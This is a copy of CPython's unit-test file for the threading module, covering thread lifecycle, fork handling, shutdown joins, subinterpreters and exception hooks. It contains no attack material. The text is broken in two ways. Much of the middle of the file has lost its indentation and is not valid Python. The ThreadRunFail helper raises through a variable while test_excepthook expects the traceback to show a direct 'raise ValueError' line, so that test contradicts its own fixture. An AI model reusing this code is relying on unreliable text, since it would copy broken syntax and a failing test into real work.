"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/test/test_threading.py | lwd-temp/cpython | 34a49aa3e4d023b5f9e9029f4f1ec68f1a8a8120 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | """
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
    """A trivial mutable integer counter (callers provide their own locking)."""
    def __init__(self):
        # Counting starts at zero.
        self.value = 0
    def inc(self):
        """Increase the count by one."""
        self.value = self.value + 1
    def dec(self):
        """Decrease the count by one."""
        self.value = self.value - 1
    def get(self):
        """Return the current count."""
        return self.value
class TestThread(threading.Thread):
    """Worker thread for test_various_ops: runs briefly under a semaphore
    while asserting, via the shared Counter, how many peers run at once."""
    def __init__(self, name, testcase, sema, mutex, nrunning):
        threading.Thread.__init__(self, name=name)
        self.testcase = testcase
        self.sema = sema
        self.mutex = mutex
        # Shared Counter of currently running workers.
        self.nrunning = nrunning
    def run(self):
        # Tiny random delay (< 100 usec) so thread interleavings vary.
        delay = random.random() / 10000.0
        if verbose:
            print('task %s will run for %.1f usec' %
                  (self.name, delay * 1e6))
        with self.sema:
            with self.mutex:
                self.nrunning.inc()
                if verbose:
                    print(self.nrunning.get(), 'tasks are running')
                # The caller's BoundedSemaphore(value=3) caps concurrency.
                self.testcase.assertLessEqual(self.nrunning.get(), 3)
            time.sleep(delay)
            if verbose:
                print('task', self.name, 'done')
            with self.mutex:
                self.nrunning.dec()
                # Count must never go negative.
                self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
                if verbose:
                    print('%s is finished. %d tasks are running' %
                          (self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
    """Common fixture: snapshot live threads before each test and verify
    they are cleaned up (and child processes reaped) afterwards."""
    def setUp(self):
        # Record the threading state so tearDown can detect leaked threads.
        self._threads = test.support.threading_setup()
    def tearDown(self):
        test.support.threading_cleanup(*self._threads)
        test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_reinit_tls_after_fork(self):
        """fork() from many threads at once must not deadlock (bpo-13817)."""
        # Issue #13817: fork() would deadlock in a multithreaded program with
        # the ad-hoc TLS implementation.
        def do_fork_and_wait():
            # just fork a child process and wait it
            pid = os.fork()
            if pid > 0:
                os.waitpid(pid, 0)
            else:
                os._exit(0)
        # start a bunch of threads that will fork() child processes
        threads = []
        for i in range(16):
            t = threading.Thread(target=do_fork_and_wait)
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    def test_clear_threads_states_after_fork(self):
        """After fork(), the child must see only its own thread state (bpo-17094)."""
        # Issue #17094: check that threads states are cleared after fork()
        # start a bunch of threads
        threads = []
        for i in range(16):
            t = threading.Thread(target=lambda : time.sleep(0.3))
            threads.append(t)
            t.start()
        pid = os.fork()
        if pid == 0:
            # check that threads states have been cleared
            # (exactly one frame set == only the forked main thread remains)
            if len(sys._current_frames()) == 1:
                os._exit(0)
            else:
                os._exit(1)
        else:
            _, status = os.waitpid(pid, 0)
            self.assertEqual(0, status)
            for t in threads:
                t.join()
class SubinterpThreadingTests(BaseTestCase):
    """Thread behavior inside subinterpreters (test.support.run_in_subinterp)."""
    def pipe(self):
        # Create a pipe whose ends are closed automatically at test teardown;
        # the read end is non-blocking so a failed test doesn't hang on read.
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)
        if hasattr(os, 'set_blocking'):
            os.set_blocking(r, False)
        return (r, w)
    def test_threads_join(self):
        # Non-daemon threads should be joined at subinterpreter shutdown
        # (issue #18808)
        r, w = self.pipe()
        code = textwrap.dedent(r"""
            import os
            import random
            import threading
            import time
            def random_sleep():
                seconds = random.random() * 0.010
                time.sleep(seconds)
            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                random_sleep()
                os.write(%d, b"x")
            threading.Thread(target=f).start()
            random_sleep()
        """ % (w,))
        ret = test.support.run_in_subinterp(code)
        self.assertEqual(ret, 0)
        # The thread was joined properly.
        self.assertEqual(os.read(r, 1), b"x")
    def test_threads_join_2(self):
        # Same as above, but a delay gets introduced after the thread's
        # Python code returned but before the thread state is deleted.
        # To achieve this, we register a thread-local object which sleeps
        # a bit when deallocated.
        r, w = self.pipe()
        code = textwrap.dedent(r"""
            import os
            import random
            import threading
            import time
            def random_sleep():
                seconds = random.random() * 0.010
                time.sleep(seconds)
            class Sleeper:
                def __del__(self):
                    random_sleep()
            tls = threading.local()
            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                random_sleep()
                tls.x = Sleeper()
                os.write(%d, b"x")
            threading.Thread(target=f).start()
            random_sleep()
        """ % (w,))
        ret = test.support.run_in_subinterp(code)
        self.assertEqual(ret, 0)
        # The thread was joined properly.
        self.assertEqual(os.read(r, 1), b"x")
    def test_daemon_thread(self):
        # Daemon threads are rejected inside subinterpreters; the script
        # reports the outcome over the pipe instead of via its exit status.
        r, w = self.pipe()
        code = textwrap.dedent(f"""
            import threading
            import sys
            channel = open({w}, "w", closefd=False)
            def func():
                pass
            thread = threading.Thread(target=func, daemon=True)
            try:
                thread.start()
            except RuntimeError as exc:
                print("ok: %s" % exc, file=channel, flush=True)
            else:
                thread.join()
                print("fail: RuntimeError not raised", file=channel, flush=True)
        """)
        ret = test.support.run_in_subinterp(code)
        self.assertEqual(ret, 0)
        msg = os.read(r, 100).decode().rstrip()
        self.assertEqual("ok: daemon thread are not supported "
                         "in subinterpreters", msg)
class ThreadingExceptionTests(BaseTestCase):
    """Error conditions in the threading API and unhandled-exception output."""
    # A RuntimeError should be raised if Thread.start() is called
    # multiple times.
    def test_start_thread_again(self):
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, thread.start)
        thread.join()
    def test_joining_current_thread(self):
        # A thread may never join itself.
        current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join);
    def test_joining_inactive_thread(self):
        # join() before start() is an error.
        thread = threading.Thread()
        self.assertRaises(RuntimeError, thread.join)
    def test_daemonize_active_thread(self):
        # The daemon flag may only be set before start().
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
        thread.join()
    def test_releasing_unacquired_lock(self):
        lock = threading.Lock()
        self.assertRaises(RuntimeError, lock.release)
    def test_recursion_limit(self):
        # Issue 9670
        # test that excessive recursion within a non-main thread causes
        # an exception rather than crashing the interpreter on platforms
        # like Mac OS X or FreeBSD which have small default stack sizes
        # for threads
        script = """if True:
            import threading
            def recurse():
                return recurse()
            def outer():
                try:
                    recurse()
                except RecursionError:
                    pass
            w = threading.Thread(target=outer)
            w.start()
            w.join()
            print('end of main thread')
            """
        expected_output = "end of main thread\n"
        p = subprocess.Popen([sys.executable, "-c", script],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = p.communicate()
        data = stdout.decode().replace('\r', '')
        self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
        self.assertEqual(data, expected_output)
    def test_print_exception(self):
        # An unhandled exception in a non-main thread is reported on stderr.
        script = r"""if True:
            import threading
            import time
            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        err = err.decode()
        self.assertIn("Exception in thread", err)
        self.assertIn("Traceback (most recent call last):", err)
        self.assertIn("ZeroDivisionError", err)
        self.assertNotIn("Unhandled exception", err)
    def test_print_exception_stderr_is_none_1(self):
        # sys.stderr set to None *after* thread start: the traceback must
        # still be printed (the thread keeps a reference to the real stderr).
        script = r"""if True:
            import sys
            import threading
            import time
            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            sys.stderr = None
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        err = err.decode()
        self.assertIn("Exception in thread", err)
        self.assertIn("Traceback (most recent call last):", err)
        self.assertIn("ZeroDivisionError", err)
        self.assertNotIn("Unhandled exception", err)
    def test_print_exception_stderr_is_none_2(self):
        # sys.stderr set to None *before* thread creation: nothing usable
        # to print to, so no "Unhandled exception" message may appear.
        script = r"""if True:
            import sys
            import threading
            import time
            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            sys.stderr = None
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        self.assertNotIn("Unhandled exception", err.decode())
    def test_bare_raise_in_brand_new_thread(self):
        # A bare `raise` with no active exception must produce RuntimeError,
        # even in a thread that has never seen an exception (bpo-27558).
        def bare_raise():
            raise
        class Issue27558(threading.Thread):
            exc = None
            def run(self):
                try:
                    bare_raise()
                except Exception as exc:
                    self.exc = exc
        thread = Issue27558()
        thread.start()
        thread.join()
        self.assertIsNotNone(thread.exc)
        self.assertIsInstance(thread.exc, RuntimeError)
        # explicitly break the reference cycle to not leak a dangling thread
        thread.exc = None
class ThreadRunFail(threading.Thread):
    """A thread whose run() always fails, used to exercise excepthook paths."""
    def run(self):
        failure = ValueError("run failed")
        raise failure
class ExceptHookTests(BaseTestCase):
    """Behavior of threading.excepthook and custom replacements for it."""
    def test_excepthook(self):
        # Default hook: full traceback with the thread's name on stderr.
        with support.captured_output("stderr") as stderr:
            thread = ThreadRunFail(name="excepthook thread")
            thread.start()
            thread.join()
        stderr = stderr.getvalue().strip()
        self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
        self.assertIn('Traceback (most recent call last):\n', stderr)
        self.assertIn(' raise ValueError("run failed")', stderr)
        self.assertIn('ValueError: run failed', stderr)
    @support.cpython_only
    def test_excepthook_thread_None(self):
        # threading.excepthook called with thread=None: log the thread
        # identifier in this case.
        with support.captured_output("stderr") as stderr:
            try:
                raise ValueError("bug")
            except Exception as exc:
                args = threading.ExceptHookArgs([*sys.exc_info(), None])
                try:
                    threading.excepthook(args)
                finally:
                    # Explicitly break a reference cycle
                    args = None
        stderr = stderr.getvalue().strip()
        self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
        self.assertIn('Traceback (most recent call last):\n', stderr)
